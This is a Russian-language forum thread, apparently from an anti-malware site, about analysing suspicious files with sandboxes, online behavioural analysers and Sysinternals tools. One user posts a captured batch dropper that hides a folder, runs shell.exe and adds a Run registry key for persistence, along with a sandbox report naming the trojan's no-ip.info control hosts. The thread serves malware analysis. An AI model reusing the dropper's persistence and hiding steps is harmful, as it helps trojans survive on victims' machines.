-
Junior Member
- Вес репутации
- 57
как узнать что делает вирус
Мне частенько приходится встречатся с новыми модификациями вирусов, которые вылавливаются собственными руками ,
по принципу подозрительного месту расположения, атрибутов, типу запуска и т. д.
хотелось бы узнать как проверить-узнать
каким образом работает этот зловред -
тоесть к каким ip обращается, что отсылает .
какие службы запускает, где и что в реестре пишет, какие папки создает, какие службы запускает, блокирует ,использует?
Посоветуйте каким софтом для этого пользоваться
p.s.
вот к примеру нашел вчера вот это https://www.virustotal.com/file/4544...is/1341173867/
и это точно троян или просто его часть
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
-
-
Junior Member
- Вес репутации
- 57
с этим •http://camas.comodo.com/ понятно
а что здесь •http://threatexpert.com мельком взглянув вроде как пограммы для моих задач
к стати ThreatExpert Submission Applet в win7x64 некорректно запустился не могу отправить фаил
а есть ли софт что бы проверять все локально и без наличия интернета
Последний раз редактировалось visokosnik; 02.07.2012 в 02:47.
-
Сообщение от
visokosnik
а есть ли софт что бы проверять все локально и без наличия интернета
Есть песочницы, например http://www.sandboxie.com/
Сообщение от
visokosnik
к стати ThreatExpert Submission Applet в win7x64 некорректно запустился не могу отправить фаил
http://www.threatexpert.com/submit.aspx - на этой странице можно отправить файлы без апплетов.
Ещё он-лайн вариант: http://www.norman.com/security_center/security_tools/
Пробуйте.
-
-
Junior Member
- Вес репутации
- 57
очень понравилась работа http://camas.comodo.com/
а есть ли еще ему подобные сервисы
-
Мне тоже из всех он-лайн анализаторов нравится COMODO. Все сервисы, ссылки на которые я здесь привёл выполняют аналогичные функции - анализ поведения.
-
-
Сообщение от
visokosnik
вот к примеру нашел вчера
Детект 2/42 не есть гарантия наличия вируса
Microsoft MVP 2012-2016 Consumer Security
Microsoft MVP 2016 Reconnect
-
-
-
-
Junior Member
- Вес репутации
- 57
Сообщение от
thyrex
Детект 2/42 не есть гарантия наличия вируса
согласен ,НО!!!
не раз бывало такое что сегодня 0 из 42
завтра 5 из42
а через неделю 37 из 42
- - - Добавлено - - -
подскажите а как в комоду отправить фаил shell.exe который запускается батником
Код:
@echo off
set ztmp=C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\ztmp
set MYFILES=C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\afolder
set bfcec=t18807.exe
attrib +h C:\DOCUME~1\2205~1.201\LOCALS~1\Temp\ztmp
@echo off
copy shell.exe %temp%\afolder
%temp%\afolder\shell.exe -2
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "shell" /d "%temp%\afolder\shell.exe -2" /t REG_SZ /f >nul
attrib +h %temp%\afolder
то есть если shell.exe запускать без параметров, он ни каких действий делать не будет, а
с такими параметрами shell.exe -2
покажет себя во всей красе
P.S.хитрый троянчик
Последний раз редактировалось visokosnik; 02.07.2012 в 22:35.
-
не раз бывало такое что сегодня 0 из 42
завтра 5 из42
а через неделю 37 из 42
Бывает так, но бывает и иначе. Что послезавтра становится 7-10 и дальше не наращивается кол-во.
Все дело в том, что куча вендоров тупо паразитируют на коллегах. Смотрят на конкурентов и добавляют автоматом детект себе. Увы, таких компаний много. Поэтому не нужно ориентировать на массу. ИМХО правильнее смотреть на выборку из 7-10 наиболее авторитетных вендора, которые сами проводят анализ и имеют свои базы знаний (включая облачные).
VirusInfo.info & Anti-Malware.ru |
Мой блог |
-
-
Junior Member
- Вес репутации
- 57
именно поэтому я открыл эту тему
что бы самому по действиям файла ,убедится есть ли в нем зловредный код , а не тупо смотреть на результаты virustotal
вот к примеру последний из пойманных
Код:
#
Filename(s)
File Size
File MD5
Alias / Other Info
1
%Temp%\afolder\shell.exe
11,781 bytes
0x70B23E4AD55DE99EBB65720A436069F8
Trojan.Win32.Swrort [Ikarus]
2
[file and pathname of the sample #1]
69,504 bytes
0xFE90B0F3A569B2DB346DFB620D4E5674
Win32.SuspectCrc [Ikarus]
The following directories were created:
%Temp%\afolder
%Temp%\ztmp
Memory Modifications
There were new processes created in the system:
Process Name
Process Filename
Main Module Size
shell.exe
%Temp%\afolder\shell.exe
28,672 bytes
[filename of the sample #1]
[file and pathname of the sample #1]
10,371,072 bytes
Registry Modifications
The newly created Registry Value is:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
shell = "%Temp%\afolder\shell.exe -2"
so that shell.exe runs every time Windows starts
Other details
To mark the presence in the system, the following Mutex object was created:
)!VoqA.I4
The following Host Names were requested from a host database:
fad.no-ip.info
sudo.no-ip.info
ser.no-ip.info
brutal.no-ip.info
There was a registered attempt to establish connection with the remote host. The connection details are:
Remote Host
Port Number
fad.no-ip.info
443
Outbound traffic
There was an outbound traffic produced on port 443:
00000000 | E570 6780 DE78 F14E 89C7 3DA4 3AA9 4333 | .pg..x.N..=.:.C3
00000010 | AECF 0415 A67F AE05 C4C0 2270 64E5 6A3E | .........."pd.j>
00000020 | 559E 8160 8D5E 9BB3 6712 726E 721F 1677 | U..`.^..g.rnr..w
00000030 | 57F1 C6F0 E209 EFBD 9BD4 972C 9CB3 4753 | W..........,..GS
00000040 | E1D0 2E6A 92EF 5A4D 61D3 C03C 7E66 BAE5 | ...j..ZMa..<~f..
00000050 | 65E6 D851 4581 6B89 519A 4EC6 61F3 EFB6 | e..QE.k.Q.N.a...
00000060 | D8E6 71DB EDE6 C172 3A9D C1CB CE6B 6DA4 | ..q....r:....km.
00000070 | BA61 39E1 689A 95A4 6077 0FFF 7A3E 6821 | .a9.h...`w..z>h!
00000080 | 072C BD41 6085 93A8 623F BF45 D6D7 C3B3 | .,.A`...b?.E....
00000090 | DB0C F51E CFF2 7BA6 7BDA E715 877B 31BA | ......{.{....{1.
000000A0 | 70D8 5EAB 7B67 FC57 55CE 8C24 5D9E F9B8 | p.^.{g.WU..$]...
000000B0 | E897 7A06 685A AD6E 1DE4 5CBA 7123 8156 | ..z.hZ.n..\.q#.V
000000C0 | 04D8 2F87 78C6 1286 F615 D3B3 D6C8 1A86 | ../.x...........
000000D0 | 9358 C19F 0D12 C7DC E033 0FE0 29CE E978 | .X.......3..)..x
000000E0 | 6A72 33B4 4F3F 83F1 BE8A C725 0AB6 AE4C | jr3.O?.....%...L
000000F0 | D9D2 1FCD 7C36 3595 304B 1EFE 20D8 6332 | ....|65.0K.. .c2
хотя на вирустотале https://www.virustotal.com/file/db29...07c6/analysis/
промолчали самые известные
avira
avast
avg
DrWeb
Kaspersky
NOD32
и тд
а вот результаты комоды
http://camas.comodo.com/cgi-bin/subm...cf5a90e70007c6
вот так ведь сразу видно что это бекдор
-
Сообщение от
Ilya Shabanov
Когда-то для тестовых целей я делал просто. Ставил программу для контроля файловой системы, Adinf и аналог + программу для контроля изменений реестра. Далее делаешь снепшот, запускаешь вредоноса и смотришь куда он прописался и что где раскидал
утилиты от Матусека здорово помогают в этом деле.
Павел
AVZ HijackThis помощь с 10-00 до 18-00МСК
Windows7, SEP(work)
WindowsXP KIS(home)
На up не реагирую
-
-
Junior Member
- Вес репутации
- 57
Сообщение от
PavelA
утилиты от Матусека здорово помогают в этом деле.
а кто токой Матусека? можно поподробней
-
Сообщение от
visokosnik
а кто токой Матусека? можно поподробней
Не кто, а что.
matousec.com
-
-
Я немного ошибся и имел, конечно, в виду другую известную личность: Марка Русиновича, ныне сотрудника МС. Его блог, кстати есть на русском, содержит много информации по изучению различных программ.
Павел
AVZ HijackThis помощь с 10-00 до 18-00МСК
Windows7, SEP(work)
WindowsXP KIS(home)
На up не реагирую
-
-
Слушал тренинг Марка, где он показывал как при помощи только его утилит SysInternals можно обнаружить подозрительные процессы и удалить их. Никаких других средств он не использовал при этом.
VirusInfo.info & Anti-Malware.ru |
Мой блог |
-
-
Junior Member (OID)
- Вес репутации
- 36
Здравствуйте.
Только что мне один человек сбросил файл под видом песни, но с разрешением *.exe, прогнал его через Comodo и вот результат http://camas.comodo.com/cgi-bin/subm...47f8627fca443f
Я не спец, но хотелось бы узнать, что эти результаты тестов говорят? Расшифруйте, пожалуйста.
З.Ы.
"Keys Created
• Keys Changed
• Keys Deleted"
Это значит создание, изменение и удаление паролей?
-
Сообщение от
Владимир Клименко
Это значит создание, изменение и удаление паролей?
Нет, это означает создание, изменение или удаление ключей системного реестра.
Из этого отчёта видно, что программа осуществляет HTTP запрос на определённый сайт (указан в таблице).
Если вас интересуют подробности о данной вредоносной программы, вы можете прислать её нам и получить ответ в соответствующей теме.
-